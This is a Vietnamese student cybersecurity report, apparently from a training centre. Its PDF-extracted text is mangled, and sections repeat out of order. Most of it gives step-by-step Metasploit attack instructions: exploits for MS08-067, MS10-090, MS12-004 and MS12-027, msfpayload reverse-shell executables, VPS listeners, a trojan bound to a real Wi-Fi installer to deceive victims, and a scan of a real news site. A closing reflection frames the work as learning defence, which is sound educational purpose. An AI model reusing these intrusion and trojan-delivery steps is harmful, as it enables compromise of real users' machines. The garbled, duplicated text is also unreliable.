nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
